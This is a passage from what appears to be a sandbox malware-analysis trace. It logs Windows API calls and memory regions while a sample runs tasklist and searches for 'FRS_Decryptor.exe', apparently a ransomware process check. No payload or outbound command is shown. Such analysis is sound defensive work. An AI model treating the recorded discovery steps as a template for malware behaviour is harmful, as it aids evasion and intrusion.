lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0083.308] InitializeProcThreadAttributeList (in: lpAttributeList=0x71f4c0, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x71f4a4 | out: lpAttributeList=0x71f4c0, lpSize=0x71f4a4) returned 1 [0083.308] UpdateProcThreadAttribute (in: lpAttributeList=0x71f4c0, dwFlags=0x0, Attribute=0x60001, lpValue=0x71f4ac, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x71f4c0, lpPreviousValue=0x0) returned 1 [0083.308] GetStartupInfoW (in: lpStartupInfo=0x71f4f8 | out: lpStartupInfo=0x71f4f8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x24, hStdOutput=0x158, hStdError=0x2c)) [0083.308] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0083.308] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0083.308] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0083.308] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0083.308] _wcsnicmp (_String1="COPYCMD", _String2="cmdln=", _MaxCount=0x7) returned 2 [0083.308] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0083.308] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0083.308] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0083.308] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0083.308] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0083.308] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0083.308] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0083.308] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0083.309] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0083.309] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0083.309] _wcsnicmp (_String1="COPYCMD", _String2="MYFILES", _MaxCount=0x7) returned -10 [0083.309] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0083.309] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0083.309] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0083.309] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0083.309] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0083.309] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0083.309] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0083.309] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0083.309] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0083.309] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0083.309] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0083.309] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0083.309] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0083.309] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0083.309] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0083.309] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0083.309] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0083.309] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0083.309] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0083.309] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0083.309] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0083.309] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0083.309] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0083.309] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0083.309] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0083.309] lstrcmpW (lpString1="\\find.exe", lpString2="\\XCOPY.EXE") returned -1 [0083.309] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\find.exe", lpCommandLine="find /i \"FRS_Decryptor.exe\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5JgHKoaOfdp\\Desktop", lpStartupInfo=0x71f448*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="find /i \"FRS_Decryptor.exe\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x71f494 | out: lpCommandLine="find /i \"FRS_Decryptor.exe\"", lpProcessInformation=0x71f494*(hProcess=0x60, hThread=0x54, dwProcessId=0x820, dwThreadId=0x8d8)) returned 1 [0083.312] CloseHandle (hObject=0x54) returned 1 [0083.312] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0083.312] GetEnvironmentStringsW () returned 0xa3ad78* [0083.312] FreeEnvironmentStringsA (penv="=") returned 1 [0083.312] DeleteProcThreadAttributeList (in: lpAttributeList=0x71f4c0 | out: lpAttributeList=0x71f4c0) [0083.312] _dup2 (_FileHandleSrc=4, _FileHandleDst=0) returned 0 [0083.312] _close (_FileHandle=4) returned 0 [0083.312] WaitForSingleObject (hHandle=0x64, dwMilliseconds=0xffffffff) returned 0x0 [0083.748] GetExitCodeProcess (in: hProcess=0x64, lpExitCode=0x71f808 | out: lpExitCode=0x71f808*=0x0) returned 1 [0083.748] CloseHandle (hObject=0x64) returned 1 [0083.748] WaitForSingleObject (hHandle=0x60, dwMilliseconds=0xffffffff) returned 0x0 [0083.749] GetExitCodeProcess (in: hProcess=0x60, lpExitCode=0x71f808 | out: lpExitCode=0x71f808*=0x0) returned 1 [0083.749] CloseHandle (hObject=0x60) returned 1 [0083.749] _get_osfhandle (_FileHandle=1) returned 0x158 [0083.749] SetConsoleMode (hConsoleHandle=0x158, dwMode=0x0) returned 0 [0083.749] _get_osfhandle (_FileHandle=1) returned 0x158 [0083.749] GetConsoleMode (in: hConsoleHandle=0x158, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 0 [0083.749] _get_osfhandle (_FileHandle=0) returned 0x24 [0083.749] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0083.750] SetConsoleInputExeNameW () returned 0x1 [0083.750] GetConsoleOutputCP () returned 0x1b5 [0083.750] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0083.750] SetThreadUILanguage (LangId=0x0) returned 0x409 [0083.750] exit (_Code=0) Process: id = "67" image_name = "tasklist.exe" filename = "c:\\windows\\syswow64\\tasklist.exe" page_root = "0x127dc000" os_pid = "0x8dc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "66" os_parent_pid = "0xbe4" cmd_line = "tasklist" cur_dir = "C:\\Users\\5JgHKoaOfdp\\Desktop\\" os_username = "FIVAUF\\5JgHKoaOfdp" os_groups = "FIVAUF\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000bed0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3582 start_va = 0xa0000 end_va = 0xb6fff entry_point = 0xa0000 region_type = mapped_file name = "tasklist.exe" filename = "\\Windows\\SysWOW64\\tasklist.exe" (normalized: "c:\\windows\\syswow64\\tasklist.exe") Region: id = 3583 start_va = 0x850000 end_va = 0x86ffff entry_point = 0x0 region_type = private name = "private_0x0000000000850000" filename = "" Region: id = 3584 start_va = 0x870000 end_va = 0x871fff entry_point = 0x0 region_type = private name = "private_0x0000000000870000" filename = "" Region: id = 3585 start_va = 0x880000 end_va = 0x88efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000880000" filename = "" Region: id = 3586 start_va = 0x890000 end_va = 0x8cffff entry_point = 0x0 region_type = private name = "private_0x0000000000890000" filename = "" Region: id = 3587 start_va = 0x8d0000 end_va = 0x90ffff entry_point = 0x0 region_type = private name = "private_0x00000000008d0000" filename = "" Region: id = 3588 start_va = 0x910000 end_va = 0x913fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000910000" filename = "" Region: id = 3589 start_va = 0x920000 end_va = 0x920fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000920000" filename = "" Region: id = 3590 start_va = 0x930000 end_va = 0x931fff entry_point = 0x0 region_type = private name = "private_0x0000000000930000" filename = "" Region: id = 3591 start_va = 0x770a0000 end_va = 0x77207fff entry_point = 0x770a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 3592 start_va = 0x7ed70000 end_va = 0x7ed92fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ed70000" filename = "" Region: id = 3593 start_va = 0x7ed94000 end_va = 0x7ed94fff entry_point = 0x0 region_type = private name = "private_0x000000007ed94000" filename = "" Region: id = 3594 start_va = 0x7ed9b000 end_va = 0x7ed9dfff entry_point = 0x0 region_type = private name = "private_0x000000007ed9b000" filename = "" Region: id = 3595 start_va = 0x7ed9e000 end_va = 0x7ed9efff entry_point = 0x0 region_type = private name = "private_0x000000007ed9e000" filename = "" Region: id = 3596 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3597 start_va = 0x7fff0000 end_va = 0x7ffb1d6dffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 3598 start_va = 0x7ffb1d6e0000 end_va = 0x7ffb1d889fff entry_point = 0x7ffb1d6e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3599 start_va = 0x7ffb1d88a000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffb1d88a000" filename = "" Region: id = 3619 start_va = 0x9c0000 end_va = 0x9cffff entry_point = 0x0 region_type = private name = "private_0x00000000009c0000" filename = "" Region: id = 3620 start_va = 0x76fd0000 end_va = 0x76fd8fff entry_point = 0x76fd0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 3621 start_va = 0x76fe0000 end_va = 0x77047fff entry_point = 0x76fe0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 3622 start_va = 0x77050000 end_va = 0x77098fff entry_point = 0x77050000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 3627 start_va = 0x850000 end_va = 0x85ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000850000" filename = "" Region: id = 3628 start_va = 0x860000 end_va = 0x863fff entry_point = 0x0 region_type = private name = "private_0x0000000000860000" filename = "" Region: id = 3629 start_va = 0x940000 end_va = 0x9bdfff entry_point = 0x940000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3630 start_va = 0x9e0000 end_va = 0xadffff entry_point = 0x0 region_type = private name = "private_0x00000000009e0000" filename = "" Region: id = 3631 start_va = 0x73570000 end_va = 0x736b7fff entry_point = 0x73570000 region_type = mapped_file name = "dbghelp.dll" filename = "\\Windows\\SysWOW64\\dbghelp.dll" (normalized: "c:\\windows\\syswow64\\dbghelp.dll") Region: id = 3632 start_va = 0x736c0000 end_va = 0x736d1fff entry_point = 0x736c0000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\SysWOW64\\netapi32.dll" (normalized: "c:\\windows\\syswow64\\netapi32.dll") Region: id = 3633 start_va = 0x73da0000 end_va = 0x73ddcfff entry_point = 0x73da0000 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\SysWOW64\\framedynos.dll" (normalized: "c:\\windows\\syswow64\\framedynos.dll") Region: id = 3634 start_va = 0x73de0000 end_va = 0x73df3fff entry_point = 0x73de0000 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\SysWOW64\\mpr.dll" (normalized: "c:\\windows\\syswow64\\mpr.dll") Region: id = 3635 start_va = 0x73e10000 end_va = 0x73e18fff entry_point = 0x73e10000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\SysWOW64\\secur32.dll" (normalized: "c:\\windows\\syswow64\\secur32.dll") Region: id = 3636 start_va = 0x74310000 end_va = 0x74317fff entry_point = 0x74310000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 3637 start_va = 0x74d10000 end_va = 0x74d87fff entry_point = 0x74d10000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 3638 start_va = 0x74d90000 end_va = 0x74e16fff entry_point = 0x74d90000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 3639 start_va = 0x74ee0000 end_va = 0x74f2cfff entry_point = 0x74ee0000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 3640 start_va = 0x74f70000 end_va = 0x750affff entry_point = 0x74f70000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 3641 start_va = 0x75460000 end_va = 0x755aefff entry_point = 0x75460000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 3642 start_va = 0x75940000 end_va = 0x75a0efff entry_point = 0x75940000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 3643 start_va = 0x76c50000 end_va = 0x76d5bfff entry_point = 0x76c50000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 3644 start_va = 0x76d70000 end_va = 0x76db0fff entry_point = 0x76d70000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 3645 start_va = 0x76df0000 end_va = 0x76eadfff entry_point = 0x76df0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 3646 start_va = 0x7ec70000 end_va = 0x7ed6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ec70000" filename = "" Region: id = 3659 start_va = 0x870000 end_va = 0x872fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000870000" filename = "" Region: id = 3660 start_va = 0x9d0000 end_va = 0x9d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009d0000" filename = "" Region: id = 3661 start_va = 0xae0000 end_va = 0xae0fff entry_point = 0x0 region_type = private name = "private_0x0000000000ae0000" filename = "" Region: id = 3662 start_va = 0xaf0000 end_va = 0xaf0fff entry_point = 0x0 region_type = private name = "private_0x0000000000af0000" filename = "" Region: id = 3663 start_va = 0xb00000 end_va = 0xb03fff entry_point = 0x0 region_type = private name = "private_0x0000000000b00000" filename = "" Region: id = 3664 start_va = 0xb10000 end_va = 0xb10fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b10000" filename = "" Region: id = 3665 start_va = 0xb20000 end_va = 0xb20fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b20000" filename = "" Region: id = 3666 start_va = 0xb30000 end_va = 0xb6ffff entry_point = 0x0 region_type = private name = "private_0x0000000000b30000" filename = "" Region: id = 3667 start_va = 0xb70000 end_va = 0xbaffff entry_point = 0x0 region_type = private name = "private_0x0000000000b70000" filename = "" Region: id = 3668 start_va = 0xbd0000 end_va = 0xbdffff entry_point = 0x0 region_type = private name = "private_0x0000000000bd0000" filename = "" Region: id = 3669 start_va = 0xbe0000 end_va = 0xd67fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000be0000" filename = "" Region: id = 3670 start_va = 0xd70000 end_va = 0xef0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d70000" filename = "" Region: id = 3671 start_va = 0xf00000 end_va = 0x22fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f00000" filename = "" Region: id = 3672 start_va = 0x2300000 end_va = 0x2441fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002300000" filename = "" Region: id = 3673 start_va = 0x2450000 end_va = 0x2724fff entry_point = 0x2450000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 3674 start_va = 0x2730000 end_va = 0x2b2bfff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002730000" filename = "" Region: id = 3675 start_va = 0x2b30000 end_va = 0x2b6ffff entry_point = 0x0 region_type = private name = "private_0x0000000002b30000" filename = "" Region: id = 3676 start_va = 0x2b70000 end_va = 0x2baffff entry_point = 0x0 region_type = private name = "private_0x0000000002b70000" filename = "" Region: id = 3677 start_va = 0x2bb0000 end_va = 0x2beffff entry_point = 0x0 region_type = private name = "private_0x0000000002bb0000" filename = "" Region: id = 3678 start_va = 0x2bf0000 end_va = 0x2c2ffff entry_point = 0x0 region_type = private name = "private_0x0000000002bf0000" filename = "" Region: id = 3679 start_va = 0x73340000 end_va = 0x7335afff entry_point = 0x73340000 region_type = mapped_file name = "wmiutils.dll" filename = "\\Windows\\SysWOW64\\wbem\\wmiutils.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wmiutils.dll") Region: id = 3680 start_va = 0x73370000 end_va = 0x7341afff entry_point = 0x73370000 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\fastprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\fastprox.dll") Region: id = 3681 start_va = 0x73420000 end_va = 0x7342ffff entry_point = 0x73420000 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemsvc.dll") Region: id = 3682 start_va = 0x73430000 end_va = 0x73471fff entry_point = 0x73430000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\SysWOW64\\winsta.dll" (normalized: "c:\\windows\\syswow64\\winsta.dll") Region: id = 3683 start_va = 0x73480000 end_va = 0x734e0fff entry_point = 0x73480000 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\SysWOW64\\wbemcomn.dll" (normalized: "c:\\windows\\syswow64\\wbemcomn.dll") Region: id = 3684 start_va = 0x734f0000 end_va = 0x734fbfff entry_point = 0x734f0000 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemprox.dll") Region: id = 3685 start_va = 0x73530000 end_va = 0x7353ffff entry_point = 0x73530000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\SysWOW64\\wkscli.dll" (normalized: "c:\\windows\\syswow64\\wkscli.dll") Region: id = 3686 start_va = 0x73540000 end_va = 0x7355afff entry_point = 0x73540000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\SysWOW64\\srvcli.dll" (normalized: "c:\\windows\\syswow64\\srvcli.dll") Region: id = 3687 start_va = 0x73560000 end_va = 0x73569fff entry_point = 0x73560000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\SysWOW64\\netutils.dll" (normalized: "c:\\windows\\syswow64\\netutils.dll") Region: id = 3688 start_va = 0x73f20000 end_va = 0x73f3cfff entry_point = 0x73f20000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 3689 start_va = 0x73f40000 end_va = 0x73f6efff entry_point = 0x73f40000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 3690 start_va = 0x73f70000 end_va = 0x73f87fff entry_point = 0x73f70000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 3691 start_va = 0x745f0000 end_va = 0x745f8fff entry_point = 0x745f0000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 3692 start_va = 0x74a60000 end_va = 0x74ab2fff entry_point = 0x74a60000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 3693 start_va = 0x74ac0000 end_va = 0x74ac8fff entry_point = 0x74ac0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 3694 start_va = 0x74ad0000 end_va = 0x74aecfff entry_point = 0x74ad0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 3695 start_va = 0x74bc0000 end_va = 0x74d0dfff entry_point = 0x74bc0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 3696 start_va = 0x74e20000 end_va = 0x74ed0fff entry_point = 0x74e20000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 3697 start_va = 0x75360000 end_va = 0x75456fff entry_point = 0x75360000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 3698 start_va = 0x75700000 end_va = 0x7577cfff entry_point = 0x75700000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 3699 start_va = 0x75a10000 end_va = 0x75a4dfff entry_point = 0x75a10000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 3700 start_va = 0x76d60000 end_va = 0x76d66fff entry_point = 0x76d60000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 3701 start_va = 0x76dc0000 end_va = 0x76de4fff entry_point = 0x76dc0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 3702 start_va = 0x76ec0000 end_va = 0x76fc7fff entry_point = 0x76ec0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 3703 start_va = 0x7ec6d000 end_va = 0x7ec6ffff entry_point = 0x0 region_type = private name = "private_0x000000007ec6d000" filename = "" Region: id = 3704 start_va = 0x7ed95000 end_va = 0x7ed97fff entry_point = 0x0 region_type = private name = "private_0x000000007ed95000" filename = "" Region: id = 3705 start_va = 0x7ed98000 end_va = 0x7ed9afff entry_point = 0x0 region_type = private name = "private_0x000000007ed98000" filename = "" Thread: id = 209 os_tid = 0x974 Thread: id = 211 os_tid = 0xbe8 Thread: id = 212 os_tid = 0xb40 Thread: id = 213 os_tid = 0xb3c Process: id = "68" image_name = "find.exe" filename = "c:\\windows\\syswow64\\find.exe" page_root = "0xcdeb000" os_pid = "0x820" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "66" os_parent_pid = "0xbe4" cmd_line = "find /i \"FRS_Decryptor.exe\"" cur_dir = "C:\\Users\\5JgHKoaOfdp\\Desktop\\" os_username = "FIVAUF\\5JgHKoaOfdp" os_groups = "FIVAUF\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000bed0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3601 start_va = 0x80000 end_va = 0x9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 3602 start_va = 0xa0000 end_va = 0xa1fff entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 3603 start_va = 0xb0000 end_va = 0xbefff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000b0000" filename = "" Region: id = 3604 start_va = 0xc0000 end_va = 0xfffff entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 3605 start_va = 0x100000 end_va = 0x13ffff entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 3606 start_va = 0x140000 end_va = 0x143fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000140000" filename = "" Region: id = 3607 start_va = 0x150000 end_va = 0x150fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000150000" filename = "" Region: id = 3608 start_va = 0x160000 end_va = 0x161fff entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 3609 start_va = 0x11c0000 end_va = 0x11c6fff entry_point = 0x11c0000 region_type = mapped_file name = "find.exe" filename = "\\Windows\\SysWOW64\\find.exe" (normalized: "c:\\windows\\syswow64\\find.exe") Region: id = 3610 start_va = 0x770a0000 end_va = 0x77207fff entry_point = 0x770a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 3611 start_va = 0x7f6f0000 end_va = 0x7f712fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 3612 start_va = 0x7f71b000 end_va = 0x7f71dfff entry_point = 0x0 region_type = private name = "private_0x000000007f71b000" filename = "" Region: id = 3613 start_va = 0x7f71e000 end_va = 0x7f71efff entry_point = 0x0 region_type = private name = "private_0x000000007f71e000" filename = "" Region: id = 3614 start_va = 0x7f71f000 end_va = 0x7f71ffff entry_point = 